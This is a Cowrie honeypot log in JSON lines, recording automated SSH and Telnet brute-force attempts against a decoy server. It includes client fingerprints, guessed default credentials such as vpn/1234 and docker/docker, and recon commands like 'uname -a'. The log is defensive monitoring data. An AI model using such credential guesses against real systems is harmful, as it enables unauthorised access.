{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T00:20:34.101015Z","src_ip":"212.227.125.160","session":"8c1a4923265e"}
{"eventid":"cowrie.login.failed","username":"sol","password":"12","message":"login attempt [sol/12] failed","sensor":"my-vps","timestamp":"2025-08-28T00:20:34.283294Z","src_ip":"212.227.125.160","session":"8c1a4923265e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:20:35.344982Z","src_ip":"212.227.125.160","session":"8c1a4923265e"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":44234,"dst_ip":"1.2.3.4","dst_port":22,"session":"259d91ff34b8","protocol":"ssh","message":"New connection: 194.233.79.134:44234 (1.2.3.4:22) [session: 259d91ff34b8]","sensor":"my-vps","timestamp":"2025-08-28T00:20:48.514995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:20:48.935308Z","src_ip":"194.233.79.134","session":"259d91ff34b8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:20:48.936136Z","src_ip":"194.233.79.134","session":"259d91ff34b8"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"esuser","message":"login attempt [esuser/esuser] failed","sensor":"my-vps","timestamp":"2025-08-28T00:20:52.262889Z","src_ip":"194.233.79.134","session":"259d91ff34b8"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:20:53.838753Z","src_ip":"194.233.79.134","session":"259d91ff34b8"}
{"eventid":"cowrie.session.connect","src_ip":"173.212.245.48","src_port":57056,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3c81db62a9d","protocol":"ssh","message":"New connection: 173.212.245.48:57056 (1.2.3.4:22) [session: f3c81db62a9d]","sensor":"my-vps","timestamp":"2025-08-28T00:22:05.616003Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:22:05.692465Z","src_ip":"173.212.245.48","session":"f3c81db62a9d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:22:05.693413Z","src_ip":"173.212.245.48","session":"f3c81db62a9d"}
{"eventid":"cowrie.login.success","username":"root","password":"040877","message":"login attempt [root/040877] succeeded","sensor":"my-vps","timestamp":"2025-08-28T00:22:05.854570Z","src_ip":"173.212.245.48","session":"f3c81db62a9d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T00:22:06.086166Z","src_ip":"173.212.245.48","session":"f3c81db62a9d"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-28T00:22:06.086872Z","src_ip":"173.212.245.48","session":"f3c81db62a9d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:22:06.202296Z","src_ip":"173.212.245.48","session":"f3c81db62a9d"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:22:06.203439Z","src_ip":"173.212.245.48","session":"f3c81db62a9d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54525,"dst_ip":"1.2.3.4","dst_port":22,"session":"192cbcdc1432","protocol":"ssh","message":"New connection: 212.227.235.229:54525 (1.2.3.4:22) [session: 192cbcdc1432]","sensor":"my-vps","timestamp":"2025-08-28T00:22:06.879480Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T00:22:06.880330Z","src_ip":"212.227.235.229","session":"192cbcdc1432"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T00:22:07.004850Z","src_ip":"212.227.235.229","session":"192cbcdc1432"}
{"eventid":"cowrie.login.failed","username":"vpn","password":"vpn","message":"login attempt [vpn/vpn] failed","sensor":"my-vps","timestamp":"2025-08-28T00:22:07.590532Z","src_ip":"212.227.235.229","session":"192cbcdc1432"}
{"eventid":"cowrie.login.failed","username":"vpn","password":"1234","message":"login attempt [vpn/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T00:22:08.720326Z","src_ip":"212.227.235.229","session":"192cbcdc1432"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":33941,"dst_ip":"1.2.3.4","dst_port":22,"session":"97883ed591ff","protocol":"ssh","message":"New connection: 186.225.142.90:33941 (1.2.3.4:22) [session: 97883ed591ff]","sensor":"my-vps","timestamp":"2025-08-28T00:22:09.303802Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:22:09.305267Z","src_ip":"186.225.142.90","session":"97883ed591ff"}
{"eventid":"cowrie.login.failed","username":"vpn","password":"123456","message":"login attempt [vpn/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T00:22:09.846743Z","src_ip":"212.227.235.229","session":"192cbcdc1432"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:22:10.619981Z","src_ip":"186.225.142.90","session":"97883ed591ff"}
{"eventid":"cowrie.login.failed","username":"vpn","password":"abc123","message":"login attempt [vpn/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T00:22:10.973132Z","src_ip":"212.227.235.229","session":"192cbcdc1432"}
{"eventid":"cowrie.login.failed","username":"vpn","password":"abcd123","message":"login attempt [vpn/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T00:22:12.100717Z","src_ip":"212.227.235.229","session":"192cbcdc1432"}
{"eventid":"cowrie.login.success","username":"root","password":"0683895675Arthur","message":"login attempt [root/0683895675Arthur] succeeded","sensor":"my-vps","timestamp":"2025-08-28T00:22:12.318528Z","src_ip":"186.225.142.90","session":"97883ed591ff"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:22:13.242911Z","src_ip":"212.227.235.229","session":"192cbcdc1432"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T00:22:13.509881Z","src_ip":"186.225.142.90","session":"97883ed591ff"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T00:22:13.510560Z","src_ip":"186.225.142.90","session":"97883ed591ff"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:22:14.031576Z","src_ip":"186.225.142.90","session":"97883ed591ff"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:22:14.349387Z","src_ip":"186.225.142.90","session":"97883ed591ff"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":42310,"dst_ip":"1.2.3.4","dst_port":22,"session":"31e7ee5b4a1e","protocol":"ssh","message":"New connection: 194.233.79.134:42310 (1.2.3.4:22) [session: 31e7ee5b4a1e]","sensor":"my-vps","timestamp":"2025-08-28T00:22:25.061529Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:22:25.972083Z","src_ip":"194.233.79.134","session":"31e7ee5b4a1e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:22:25.973027Z","src_ip":"194.233.79.134","session":"31e7ee5b4a1e"}
{"eventid":"cowrie.login.failed","username":"observer","password":"observer","message":"login attempt [observer/observer] failed","sensor":"my-vps","timestamp":"2025-08-28T00:22:27.151141Z","src_ip":"194.233.79.134","session":"31e7ee5b4a1e"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:22:28.401278Z","src_ip":"194.233.79.134","session":"31e7ee5b4a1e"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":50136,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b7df9111580","protocol":"ssh","message":"New connection: 194.233.79.134:50136 (1.2.3.4:22) [session: 4b7df9111580]","sensor":"my-vps","timestamp":"2025-08-28T00:24:08.890299Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:24:08.891424Z","src_ip":"194.233.79.134","session":"4b7df9111580"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:24:09.527716Z","src_ip":"194.233.79.134","session":"4b7df9111580"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker","message":"login attempt [docker/docker] failed","sensor":"my-vps","timestamp":"2025-08-28T00:24:12.089815Z","src_ip":"194.233.79.134","session":"4b7df9111580"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:24:13.913404Z","src_ip":"194.233.79.134","session":"4b7df9111580"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43213,"dst_ip":"1.2.3.4","dst_port":23,"session":"171443469af7","protocol":"telnet","message":"New connection: 212.227.125.160:43213 (1.2.3.4:23) [session: 171443469af7]","sensor":"my-vps","timestamp":"2025-08-28T00:25:29.616538Z"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":56350,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5e6eeed41e8","protocol":"ssh","message":"New connection: 194.233.79.134:56350 (1.2.3.4:22) [session: d5e6eeed41e8]","sensor":"my-vps","timestamp":"2025-08-28T00:25:35.810725Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:25:35.811782Z","src_ip":"194.233.79.134","session":"d5e6eeed41e8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:25:36.397849Z","src_ip":"194.233.79.134","session":"d5e6eeed41e8"}
{"eventid":"cowrie.login.failed","username":"user","password":"1","message":"login attempt [user/1] failed","sensor":"my-vps","timestamp":"2025-08-28T00:25:38.300926Z","src_ip":"194.233.79.134","session":"d5e6eeed41e8"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:25:39.480883Z","src_ip":"194.233.79.134","session":"d5e6eeed41e8"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57634,"dst_ip":"1.2.3.4","dst_port":22,"session":"879ac062bef9","protocol":"ssh","message":"New connection: 217.72.205.35:57634 (1.2.3.4:22) [session: 879ac062bef9]","sensor":"my-vps","timestamp":"2025-08-28T00:26:00.253144Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:26:00.254196Z","src_ip":"217.72.205.35","session":"879ac062bef9"}
{"eventid":"cowrie.session.closed","duration":31.442387104034424,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:26:01.058864Z","src_ip":"212.227.125.160","session":"171443469af7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45144,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea4b47457227","protocol":"ssh","message":"New connection: 212.227.125.160:45144 (1.2.3.4:22) [session: ea4b47457227]","sensor":"my-vps","timestamp":"2025-08-28T00:27:08.032415Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:27:08.033339Z","src_ip":"212.227.125.160","session":"ea4b47457227"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T00:27:08.092021Z","src_ip":"212.227.125.160","session":"ea4b47457227"}
{"eventid":"cowrie.login.failed","username":"sol","password":"1","message":"login attempt [sol/1] failed","sensor":"my-vps","timestamp":"2025-08-28T00:27:08.272551Z","src_ip":"212.227.125.160","session":"ea4b47457227"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":39850,"dst_ip":"1.2.3.4","dst_port":22,"session":"2bb7b83861c7","protocol":"ssh","message":"New connection: 194.233.79.134:39850 (1.2.3.4:22) [session: 2bb7b83861c7]","sensor":"my-vps","timestamp":"2025-08-28T00:27:09.285077Z"}
